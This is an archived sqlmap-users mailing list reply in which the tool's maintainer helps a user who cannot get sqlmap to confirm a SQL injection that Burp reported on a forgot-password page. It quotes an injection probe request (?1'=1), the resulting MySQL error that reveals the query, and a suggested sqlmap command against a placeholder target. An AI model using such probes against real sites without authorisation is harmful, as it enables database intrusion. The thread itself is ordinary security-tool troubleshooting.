Re: [sqlmap-users] Tweaking SQLMap Config
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Tweaking SQLMap Config
|
From: Miroslav S. <mir...@gm...> - 2012-06-05 21:45:37
|
Hi Chris. This all looks kind of strange. At your place I would try running sqlmap against: ./sqlmap.py -u "www.target.com/forgot_password.html?1*" Putting that 1'=1 looks to me like a big no no (if you take a good look into the response you'll see for yourself that putting it does not make any sense). If everything fails, please send me a traffic file for that run I've proposed in upper lines. Kind regards, Miroslav Stampar On Tue, Jun 5, 2012 at 10:04 PM, Chris Rowe <pip...@gm...>wrote: > Hey guys, frustration is the name of the game. I have burp pro telling me > that it is a definite sql injection, but I cannot get sqlmap to find an > injection point. I have tried adding a * where the single quote is, using > the ?1 as prefix and =1 as suffix, and tuning the level and risk. I tried > loading the entire request into a file for sqlmap. If I add 2 quotes the > error goes away. Burp added the name of an arbitrarily supplied request > parameter where the highlight is. Check out this request and response. > > GET /forgot_password.html?1'=1 HTTP/1.1 > Host: XXXX.XXXXXXXX.com > User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 > Firefox/12.0 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Accept-Language: en-us,en;q=0.5 > Accept-Encoding: gzip, deflate > DNT: 1 > Referer: https://XXXXX.XXXXX.com/ > Connection: keep-alive > Cache-Control: max-age=0 > > HTTP/1.1 200 OK > Date: Tue, 05 Jun 2012 19:26:42 GMT > Server: Apache/2.2.3 (CentOS) > X-Powered-By: PHP/5.1.6 > Content-Length: 385 > Connection: close > Content-Type: text/html; charset=UTF-8 > > Error in query: SELECT id from flag WHERE url=' > https://XXXXX.XXXXX.com/forgot_password.html?1'=1' AND author_id='' AND > active='y' ORDER BY date_last_modified DESC, You have an error in your SQL > syntax; check the manual that corresponds to your MySQL server version for > the right syntax to use near '' AND author_id='' AND active='y' ORDER BY > date_last_modified DESC' at line 1 > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
